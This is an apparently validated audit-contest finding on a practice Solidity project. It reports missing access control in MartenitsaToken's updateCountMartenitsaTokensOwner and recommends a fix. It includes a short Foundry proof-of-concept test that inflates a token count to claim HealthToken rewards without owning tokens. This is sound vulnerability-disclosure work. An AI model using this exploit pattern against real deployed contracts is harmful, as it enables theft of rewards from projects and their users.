Beginner FriendlyFoundryGameFi
100 EXP
View results
Submission Details
Severity: high
Valid

`MartenitsaToken:updateCountMartenitsaTokensOwner` user can update the count of martenitsaTokens without any restrictions

Summary

In MartenitsaToken:updateCountMartenitsaTokensOwner users can update the count of martenitsaTokens without any restrictions. Then they will be able to collect as many HealthTokens as they want.

Vulnerability Details

By updating the count of martenitsaTokens without any restriction users will be able to mint HealthToken indefinitely.

  1. Update count of martenitsaTokens with MartenitsaToken:updateCountMartenitsaTokensOwner

  2. Collect the number of HealthTokens in proportion to the number of (fake) tokens you have (1 HealthToken for 3 fake MartenitsaTokens) by calling MartenitsaMarketplace:collectReward.

In this test we will collect 3 HealthToken while we don't have any martinetsaToken.

function testVulnCollectReward() public {
vm.startPrank(bob);
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
marketplace.collectReward();
assert(healthToken.balanceOf(bob) == 3 * 10 ** 18);
vm.stopPrank();
}

Impact

HealthToken can be minted and user can participate to an event without owning any martenitsaToken

Tools Used

Manuel review

Recommendations

MartenitsaToken:updateCountMartenitsaTokensOwner must be only called by MartenitsaMarketplace contract using internal visibility specifier instead of external. Therefore you will have to refactor correctly MartenitsaMarketplace contract.

Updates

Lead Judging Commences

bube Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Missing access control

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.